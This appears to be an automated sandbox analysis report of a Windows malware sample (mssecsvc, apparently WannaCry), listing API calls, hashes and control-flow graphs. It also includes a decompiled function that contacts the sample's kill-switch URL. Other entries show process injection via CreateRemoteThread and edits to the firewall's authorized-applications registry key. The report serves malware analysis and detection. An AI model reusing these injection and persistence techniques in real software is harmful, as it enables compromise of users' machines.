                                                                                                                                                0x00409b3b
                                                                                                                                                0x00409b3c
                                                                                                                                                0x00409b44
                                                                                                                                                0x00409b45
                                                                                                                                                0x00409b4a
                                                                                                                                                0x00409b4e
                                                                                                                                                0x00409b54
                                                                                                                                                0x00409b59
                                                                                                                                                0x00409b5b
                                                                                                                                                0x00409b5e
                                                                                                                                                0x00409b5f
                                                                                                                                                0x00409b60
                                                                                                                                                0x00409b67

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 801014965-0
                                                                                                                                                • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                                                                                • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                                                                                                                • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                                                                                • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC07AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 167 ac07ac-ac07bf call ac144a FreeLibrary FindCloseChangeNotification 170 ac07c5-ac07e4 CreateToolhelp32Snapshot Process32First 167->170 171 ac07eb-ac07f5 Process32Next 170->171 172 ac0865-ac0872 FindCloseChangeNotification 171->172 173 ac07f7-ac07fb 171->173 174 ac05a9-ac05d1 FindCloseChangeNotification 172->174 173->171 175 ac07fd-ac080d OpenProcess 173->175 180 ac05d3-ac05fc SetProcessAffinityMask call ac05f2 174->180 175->171 176 ac080f 175->176 177 ac0810-ac0818 call ac2574 176->177 183 ac085c-ac0863 FindCloseChangeNotification 177->183 184 ac081a-ac0820 177->184 187 ac05fe-ac061c 180->187 188 ac0621-ac0623 180->188 183->171 184->183 186 ac0822-ac0832 184->186 186->183 189 ac0834-ac084b CreateRemoteThread 186->189 187->188 190 ac064c-ac0652 188->190 191 ac0625-ac0630 188->191 189->183 193 ac084d-ac0857 call ac05ba 189->193 190->174 192 ac0658-ac0671 190->192 194 ac0639-ac0648 191->194 195 ac0632 191->195 192->174 196 ac0677-ac0690 192->196 193->183 194->190 195->194 196->174 198 ac0696-ac069c 196->198 199 ac069e-ac06b1 198->199 200 ac06d8-ac06de 198->200 199->174 201 ac06b7-ac06bd 199->201 202 ac06fc-ac0715 lstrcpyW call ac24ae 200->202 203 ac06e0-ac06f3 200->203 201->200 204 ac06bf-ac06d2 201->204 208 ac074c-ac0775 NtMapViewOfSection 202->208 209 ac0717-ac0746 GetPEB lstrcpyW lstrcatW call ac24ae 202->209 203->202 205 ac06f5 203->205 204->174 204->200 205->202 208->174 210 ac077b-ac078f call ac0305 NtOpenProcessToken 208->210 209->174 209->208 210->170 215 ac0791-ac07a3 call ac115d call ac07ac 210->215 220 ac080e-ac080f 215->220 221 ac07a5 215->221 220->177 221->177 222 ac07a7-ac07e4 CreateToolhelp32Snapshot Process32First 221->222 222->171
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00AC144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00AC145A
                                                                                                                                                  • Part of subcall function 00AC144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00AC146A
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AC05AD
                                                                                                                                                • FreeLibrary.KERNEL32(745B0000,?,00AC079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC07B8
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00AC079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC07BF
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AC07C9
                                                                                                                                                • Process32First.KERNEL32 ref: 00AC07DC
                                                                                                                                                • Process32Next.KERNEL32 ref: 00AC07ED
                                                                                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC0805
                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AC0842
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC085D
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00AC086C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChangeCloseFindNotification$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                                                                                • String ID: csrs
                                                                                                                                                • API String ID: 238827593-2321902090
                                                                                                                                                • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                                                                                • Instruction ID: 210692ee3e3c0a2648e371233e90cf56f5d7bbaf33f6bfa968fa192c927ddead
                                                                                                                                                • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                                                                                • Instruction Fuzzy Hash: 57112B30601205FFFB255F21CD4AFBF3A6DEF44701F01402DF94A9A081CAB49B019AAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                                                                                                                                                0x00408155
                                                                                                                                                0x00408157
                                                                                                                                                0x00408158
                                                                                                                                                0x0040815c
                                                                                                                                                0x00408160
                                                                                                                                                0x00408164
                                                                                                                                                0x00408168
                                                                                                                                                0x0040816c
                                                                                                                                                0x00408177
                                                                                                                                                0x0040817b
                                                                                                                                                0x0040818e
                                                                                                                                                0x00408194
                                                                                                                                                0x004081a7
                                                                                                                                                0x004081ab
                                                                                                                                                0x004081ad
                                                                                                                                                0x004081b9

                                                                                                                                                APIs
                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                                                                                                                  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                                                                  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                                                                                                                Strings
                                                                                                                                                • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                                                                                                                • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                                                                                                • API String ID: 774561529-2942426231
                                                                                                                                                • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                                                                                • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                                                                                                                                                • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                                                                                • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA4499 Relevance: 7.6, APIs: 5, Instructions: 83fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 227 7fea4499-7fea44a1 228 7fea44c8-7fea4504 CreateFileA 227->228 229 7fea44a3-7fea44ad GetFileAttributesA 227->229 236 7fea4506-7fea451f 228->236 237 7fea4527-7fea454d 228->237 229->228 230 7fea44af-7fea44c0 SetFileAttributesA 229->230 230->228 232 7fea44c2 230->232 232->228 236->237 241 7fea4521 236->241 242 7fea4558-7fea4582 CreateFileMappingA 237->242 243 7fea454f-7fea4556 237->243 241->237 246 7fea458d-7fea45a2 MapViewOfFile 242->246 247 7fea4584-7fea458b 242->247 243->242 249 7fea45a8-7fea45ae 246->249 247->246
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44A4
                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44B8
                                                                                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44ED
                                                                                                                                                • CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA4565
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA459A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1961427682-0
                                                                                                                                                • Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                                                                                • Instruction ID: 5241e261c6a8b1a9cf08daa61a461fa69fc83fe37cd40be9c894cf7c8eac2c63
                                                                                                                                                • Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                                                                                • Instruction Fuzzy Hash: E62112B0205309BFEF219E658D45BFA366DAF01619F500229E91A9E0A4D7F5AF058728
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC05BA Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 280 ac05ba-ac05bd 281 ac05bf-ac05c7 Sleep 280->281 282 ac05c9 280->282 281->280
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNELBASE(0000000A,00AC085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00AC05C1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                • Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                                                                                • Instruction ID: 9cc8f0a8d01680993bf63e34577e8a49fd1a228169588fba9a0571ccc177712d
                                                                                                                                                • Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                                                                                • Instruction Fuzzy Hash: DDB0127C240308D7DA140A10440DF041A347F00B11FE2405DE2074C0C007E407001C09
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 7FEA3C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 7FEA3CA1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 1749273276-2923680188
                                                                                                                                                • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction ID: 6856dd48e4ced1a9f2286be03aa6e2628cc93b41bccce76cbf3563a38adebb89
                                                                                                                                                • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction Fuzzy Hash: 10020571419348BFEB229F748C4ABEA7BACEF41304F004559EC4A9E081D7F66F4597A2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 00AC3CA1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00AC3CD4
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 1749273276-3999816838
                                                                                                                                                • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction ID: 80a98cb13cd68459e7336115a6dac1895a87c0bb6ad42bab614eefef71ff2ff4
                                                                                                                                                • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction Fuzzy Hash: 8D02E172408258BFEF21AF248C5AFEA7BACEF41310F06451DE8499E082D7F45F4587A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(7FEA3CBA), ref: 7FEA3CC2
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 2837544101-2923680188
                                                                                                                                                • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                                                                                • Instruction ID: b4b3212d39e947ac5d9392814a2c7224f35c85923ea667b823aff5088932c5b3
                                                                                                                                                • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                                                                                • Instruction Fuzzy Hash: 45E11371519348BFEB229F708C4ABFA7BACEF41304F004559EC4A9E081D6F66F059762
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(00AC3CBA), ref: 00AC3CC2
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00AC3CD4
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 2837544101-3999816838
                                                                                                                                                • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                                                                                • Instruction ID: 4b9440342b2253e287d26fee50ab9d9f9a533643b4c8261a8e69d5845adde2d2
                                                                                                                                                • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                                                                                • Instruction Fuzzy Hash: EBE10172508258BFEF25AF248C5AFEA7BACEF41300F06451DEC499E082D6F45F4587A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(7FEA3CE5), ref: 7FEA3CF0
                                                                                                                                                • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 7FEA3D07
                                                                                                                                                  • Part of subcall function 7FEA3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,7FEA3D12), ref: 7FEA3D20
                                                                                                                                                  • Part of subcall function 7FEA3D1F: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                  • Part of subcall function 7FEA3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                  • Part of subcall function 7FEA3D1F: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                  • Part of subcall function 7FEA3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 215653160-2923680188
                                                                                                                                                • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                                                                                • Instruction ID: 7541589ca8aef85322091197c42534de99d7bca435932005a89768fd23254656
                                                                                                                                                • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                                                                                • Instruction Fuzzy Hash: 4CE1F171409348BFEB229F708C4ABFA7BACEF42304F004559EC4A9E091D6F66F0597A1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(00AC3CE5), ref: 00AC3CF0
                                                                                                                                                • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 00AC3D07
